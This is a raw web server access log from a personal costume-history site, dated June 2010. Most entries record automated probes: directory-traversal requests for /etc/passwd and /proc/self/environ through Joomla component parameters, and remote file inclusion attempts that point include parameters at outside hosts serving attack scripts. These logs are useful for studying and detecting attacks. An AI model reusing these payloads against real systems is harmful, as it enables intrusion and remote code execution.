76.73.80.242 - - [01/Jun/2010:01:50:14 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
207.46.194.126 - - [01/Jun/2010:01:52:50 -0500] "GET /artwork/sclppz_3.JPG HTTP/1.1" 200 25884 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [01/Jun/2010:01:53:49 -0500] "GET /logs/access_log.1221696000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.180.195 - - [01/Jun/2010:01:53:49 -0500] "GET /logs//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:01:53:49 -0500] "GET /logs//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:01:53:49 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.180.195 - - [01/Jun/2010:01:53:49 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
78.48.147.24 - - [01/Jun/2010:01:53:53 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
121.190.102.21 - - [01/Jun/2010:01:54:37 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.thepanicchambers.com/cache/id/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:01:54:38 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.thepanicchambers.com/cache/id/id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:01:54:43 -0500] "GET /logs/access_log.1271548800//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.thepanicchambers.com/cache/id/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:01:55:36 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.thepanicchambers.com/cache/id/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:01:55:36 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.thepanicchambers.com/cache/id/id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:01:55:36 -0500] "GET /logs/access_log.1271548800//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.thepanicchambers.com/cache/id/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:01:56:03 -0500] "GET /logs/access_log.1271548800//220.133.120.45:8080//appserv/main.php?appserv_root=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:01:56:03 -0500] "GET //220.133.120.45:8080//appserv/main.php?appserv_root=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:01:56:03 -0500] "GET /logs//220.133.120.45:8080//appserv/main.php?appserv_root=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
174.121.79.130 - - [01/Jun/2010:01:56:36 -0500] "GET /logs/access_log.1272585600/?option=com_ninjarsssyndicator&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
174.121.79.130 - - [01/Jun/2010:01:56:36 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
174.121.79.130 - - [01/Jun/2010:01:56:36 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
209.44.120.2 - - [01/Jun/2010:01:57:57 -0500] "GET /logs//error.php?dir=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.44.120.2 - - [01/Jun/2010:01:57:57 -0500] "GET /logs/access_log.1272412800//error.php?dir=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.44.120.2 - - [01/Jun/2010:01:57:57 -0500] "GET //error.php?dir=http://phamsight.com/docs/images/head???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
122.112.32.51 - - [01/Jun/2010:01:58:47 -0500] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
122.112.32.51 - - [01/Jun/2010:01:58:47 -0500] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
122.112.32.51 - - [01/Jun/2010:01:58:47 -0500] "GET /logs/access_log.1271548800//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
93.174.120.20 - - [01/Jun/2010:01:59:16 -0500] "GET /logs/access_log.1273622400/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 371 "-""libwww-perl/5.831"
93.174.120.20 - - [01/Jun/2010:01:59:17 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 344 "-""libwww-perl/5.831"
93.174.120.20 - - [01/Jun/2010:01:59:17 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 349 "-""libwww-perl/5.831"
207.46.13.43 - - [01/Jun/2010:01:59:25 -0500] "GET /logs/access_log.1181001600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
194.100.228.237 - - [01/Jun/2010:02:00:30 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:02:00:30 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:02:00:30 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
194.100.228.237 - - [01/Jun/2010:02:00:30 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
93.174.120.20 - - [01/Jun/2010:02:00:39 -0500] "GET /logs/access_log.1274313600/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 371 "-""libwww-perl/5.831"
93.114.41.16 - - [01/Jun/2010:02:01:24 -0500] "GET /logs/access_log.1274313600//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
93.114.41.16 - - [01/Jun/2010:02:01:25 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
93.114.41.16 - - [01/Jun/2010:02:01:26 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
93.114.41.16 - - [01/Jun/2010:02:02:26 -0500] "GET /logs/access_log.1274227200//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
64.79.194.247 - - [01/Jun/2010:02:04:57 -0500] "GET /logs/access_log.1273363200///components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://h1.ripway.com/bezad/idx? HTTP/1.1" 404 357 "-""libwww-perl/5.805"
64.79.194.247 - - [01/Jun/2010:02:04:57 -0500] "GET ///components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://h1.ripway.com/bezad/idx? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
64.79.194.247 - - [01/Jun/2010:02:04:58 -0500] "GET /logs///components/com_artlinks/artlinks.dispnew.php?mosConfig.absolute.path=http://h1.ripway.com/bezad/idx? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
212.159.7.202 - - [01/Jun/2010:02:05:00 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
212.159.7.202 - - [01/Jun/2010:02:05:00 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
67.195.112.180 - - [01/Jun/2010:02:05:32 -0500] "GET /logs/access_log.1167350400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.190.102.21 - - [01/Jun/2010:02:06:42 -0500] "GET /logs/access_log.1262563200//220.133.120.45:8080//appserv/main.php?appserv_root=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:02:06:49 -0500] "GET /logs/access_log.1263081600//220.133.120.45:8080//appserv/main.php?appserv_root=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
207.46.199.183 - - [01/Jun/2010:02:10:11 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [01/Jun/2010:02:10:34 -0500] "GET /logs/access_log.1217203200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.21.43.174 - - [01/Jun/2010:02:13:11 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://www.google.com/url?sa=t&source=web&ct=res&cd=12&ved=0CB0QFjABOAo&url=http%3A%2F%2Ftomdolan.pconline.com%2Fcostume%2Findex1.htm&rct=j&q=fashion+of+italian+servant+women+1450s&ei=FLMETOWYK5XKM9z6hTw&usg=AFQjCNEDOkhmsD_BW-Fj6g1_a4F3PicJ2A""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
174.21.43.174 - - [01/Jun/2010:02:13:12 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
118.129.166.213 - - [01/Jun/2010:02:13:40 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
121.190.102.21 - - [01/Jun/2010:02:19:11 -0500] "GET ///accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:02:19:11 -0500] "GET /logs///accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:02:19:11 -0500] "GET /logs/access_log.1270512000///accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
121.190.102.21 - - [01/Jun/2010:02:19:12 -0500] "GET /logs/access_log.1262563200///accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
58.230.162.220 - - [01/Jun/2010:02:19:15 -0500] "GET /logs/access_log.1272412800//error.php?dir=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
58.230.162.220 - - [01/Jun/2010:02:19:15 -0500] "GET //error.php?dir=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
58.230.162.220 - - [01/Jun/2010:02:19:15 -0500] "GET /logs//error.php?dir=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
207.46.204.195 - - [01/Jun/2010:02:19:25 -0500] "GET /logs/access_log.1195171200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
58.230.162.220 - - [01/Jun/2010:02:19:32 -0500] "GET /logs//error.php?dir=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
58.230.162.220 - - [01/Jun/2010:02:19:32 -0500] "GET //error.php?dir=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
58.230.162.220 - - [01/Jun/2010:02:19:32 -0500] "GET /logs/access_log.1272412800//error.php?dir=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
118.129.166.213 - - [01/Jun/2010:02:19:57 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:02:20:00 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
58.230.162.220 - - [01/Jun/2010:02:20:12 -0500] "GET /logs/access_log.1272585600//error.php?dir=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
58.230.162.220 - - [01/Jun/2010:02:20:22 -0500] "GET /logs/access_log.1272585600//error.php?dir=http://jewelhub.com/includes/respon1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
118.129.166.213 - - [01/Jun/2010:02:20:48 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:02:22:15 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
109.184.182.206 - - [01/Jun/2010:02:26:16 -0500] "GET /logs/access_log.1273104000 HTTP/1.1" 200 262144 "http://yandex.ru/yandsearch?text=188.123.242.164&lr=47""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 WebMoney Advisor"
208.110.132.7 - - [01/Jun/2010:02:26:23 -0500] "GET /logs///skin/zero_vote/error.php?dir=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:02:26:23 -0500] "GET ///skin/zero_vote/error.php?dir=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:02:26:23 -0500] "GET /logs/access_log.1271548800///skin/zero_vote/error.php?dir=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:02:26:23 -0500] "GET ///skin/zero_vote/error.php?dir=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:02:26:23 -0500] "GET /logs///skin/zero_vote/error.php?dir=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:02:26:23 -0500] "GET /logs/access_log.1271548800///skin/zero_vote/error.php?dir=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:02:26:25 -0500] "GET ///skin/zero_vote/error.php?dir=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:02:26:25 -0500] "GET /logs///skin/zero_vote/error.php?dir=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
208.110.132.7 - - [01/Jun/2010:02:26:25 -0500] "GET /logs/access_log.1271548800///skin/zero_vote/error.php?dir=http://www.batdongsanotc.com/.cok/P1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
83.251.243.63 - - [01/Jun/2010:02:29:07 -0500] "GET /logs/access_log.1271894400//estrutura/enquetes/booth.php?include_path=http://www.urverkspel.com//id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
83.251.243.63 - - [01/Jun/2010:02:29:07 -0500] "GET /logs//estrutura/enquetes/booth.php?include_path=http://www.urverkspel.com//id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
83.251.243.63 - - [01/Jun/2010:02:29:07 -0500] "GET //estrutura/enquetes/booth.php?include_path=http://www.urverkspel.com//id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
67.195.112.180 - - [01/Jun/2010:02:29:25 -0500] "GET /logs/access_log.1217894400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.65.59 - - [01/Jun/2010:02:29:40 -0500] "GET /artwork/blocks2.png HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
190.152.145.54 - - [01/Jun/2010:02:30:54 -0500] "GET /logs/access_log.1271548800//index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.152.145.54 - - [01/Jun/2010:02:30:54 -0500] "GET /logs//index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
190.152.145.54 - - [01/Jun/2010:02:30:55 -0500] "GET //index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
190.152.145.54 - - [01/Jun/2010:02:31:00 -0500] "GET //index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
190.152.145.54 - - [01/Jun/2010:02:31:00 -0500] "GET /logs/access_log.1271548800//index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.152.145.54 - - [01/Jun/2010:02:31:00 -0500] "GET /logs//index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
190.152.145.54 - - [01/Jun/2010:02:31:19 -0500] "GET /logs/access_log.1271030400//index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.152.145.54 - - [01/Jun/2010:02:31:19 -0500] "GET /logs/access_log.1271030400//index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.152.145.54 - - [01/Jun/2010:02:31:31 -0500] "GET /logs/access_log.1271462400//index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.152.145.54 - - [01/Jun/2010:02:31:36 -0500] "GET /logs/access_log.1270684800//index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.152.145.54 - - [01/Jun/2010:02:31:41 -0500] "GET /logs/access_log.1270944000//index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.152.145.54 - - [01/Jun/2010:02:31:48 -0500] "GET /logs/access_log.1271808000//index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.152.145.54 - - [01/Jun/2010:02:31:48 -0500] "GET /logs/access_log.1270598400//index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.152.145.54 - - [01/Jun/2010:02:31:48 -0500] "GET /logs/access_log.1270857600//index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.152.145.54 - - [01/Jun/2010:02:31:48 -0500] "GET /logs/access_log.1271203200//index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.152.145.54 - - [01/Jun/2010:02:31:48 -0500] "GET /logs/access_log.1270512000//index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
118.129.166.213 - - [01/Jun/2010:02:32:11 -0500] "GET /logs/access_log.1274313600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:02:32:12 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:02:32:12 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:02:32:22 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:02:32:23 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:02:32:23 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:02:33:47 -0500] "GET /logs/access_log.1273622400/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
207.46.195.223 - - [01/Jun/2010:02:33:55 -0500] "GET /logs/access_log.1264291200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
190.152.145.54 - - [01/Jun/2010:02:33:58 -0500] "GET /logs/access_log.1271462400//index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.152.145.54 - - [01/Jun/2010:02:33:58 -0500] "GET /logs/access_log.1270684800//index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.152.145.54 - - [01/Jun/2010:02:34:02 -0500] "GET /logs/access_log.1270944000//index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.152.145.54 - - [01/Jun/2010:02:34:06 -0500] "GET /logs/access_log.1270598400//index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.152.145.54 - - [01/Jun/2010:02:34:06 -0500] "GET /logs/access_log.1271808000//index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.152.145.54 - - [01/Jun/2010:02:34:06 -0500] "GET /logs/access_log.1270857600//index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.152.145.54 - - [01/Jun/2010:02:34:06 -0500] "GET /logs/access_log.1270512000//index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
190.152.145.54 - - [01/Jun/2010:02:34:06 -0500] "GET /logs/access_log.1271203200//index.php?option=com_sefservicemap&mosConfig_absolute_path=http://personnel.exclusive-company.ru/cok1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.170.107.145 - - [01/Jun/2010:02:34:08 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
83.170.107.145 - - [01/Jun/2010:02:34:08 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
94.155.115.220 - - [01/Jun/2010:02:34:58 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://ravensgard.org/gerekr/costume.html""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.155.115.220 - - [01/Jun/2010:02:34:59 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.155.115.220 - - [01/Jun/2010:02:34:59 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.155.115.220 - - [01/Jun/2010:02:35:00 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.155.115.220 - - [01/Jun/2010:02:35:00 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
118.129.166.213 - - [01/Jun/2010:02:35:15 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:02:35:15 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:02:35:16 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
209.44.120.2 - - [01/Jun/2010:02:36:12 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
